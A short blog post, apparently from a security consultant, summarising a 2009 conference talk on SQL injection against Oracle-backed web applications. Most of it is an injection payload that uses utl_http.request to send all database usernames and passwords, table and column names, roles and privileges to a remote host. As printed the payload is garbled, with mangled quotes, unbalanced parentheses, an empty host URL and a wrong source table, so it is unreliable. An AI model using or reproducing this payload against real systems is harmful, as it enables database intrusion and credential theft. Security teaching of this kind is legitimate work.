IT Underground Prague – Presentation

Just back from the IT Underground 2009 in Prague.

I met several smart security consultants and some of my customers from different countries in Europe (Belgium, Poland, Germany, UK, …) and had a lot of interesting talks.

I gave a presentation concerning SQL Injection in web applications with Oracle backend databases.

Here a short example from the presentation:

The following (vulnerable) URL is sending all usernames/passwords, all accessible tables, tables and column, roles and privileges in a single SQL statement to a remote system. This can be done with a simple trick. Just use sum(length(utl_http.request(()))).‚ or 1=((select sum(length(utl_http.request(‚’username||’=’||password) from dba_users)))+((select sum(length(utl_http.request(‚’owner||’=’||table_name) from dba_tables)))+((select sum(length(utl_http.request(‚’owner||’=’||table_name||’=’||column_name)) from dba_users))+((select sum(length(utl_http.request(‚’grantee||’=’||granted_role) from dba_role_privs)))+((select sum(length(utl_http.request(‚’grantee||’=’||owner||’=’||table_name||’=’||privilege||’=’||grantable) from dba_tab_privs)))–

More details in the presentation.

Leave a Reply

You must be logged in to post a comment.